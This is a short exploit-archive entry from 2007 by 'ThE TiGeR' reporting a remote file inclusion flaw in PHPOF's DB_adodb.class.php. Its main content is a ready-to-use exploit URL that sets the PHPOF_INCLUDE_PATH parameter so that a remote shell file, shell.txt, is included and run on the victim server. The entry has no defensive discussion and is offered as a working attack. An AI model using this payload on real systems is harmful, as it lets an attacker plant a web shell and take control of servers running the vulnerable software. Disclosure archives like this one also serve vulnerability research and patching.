id: 2109
date: 09/03/2007
title: PHPOF <= 20040226 (DB_adodb.class.php) RFI Vulnerability
author: ThE TiGeR
cves: 

========================================================
PHPOF <= 20040226 (DB_adodb.class.php) RFI Vulnerability
========================================================



#Phpof Remote file inclusion

#Download script : http://www.phpof.org/phpof-20040226.tar.bz2

#Thx Str0ke

#Exploit :

#http://victime.com/[phpof_path]/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=shell.txt?

#Discoverd by ThE TiGeR



#  0day.today [2023-03-26]  #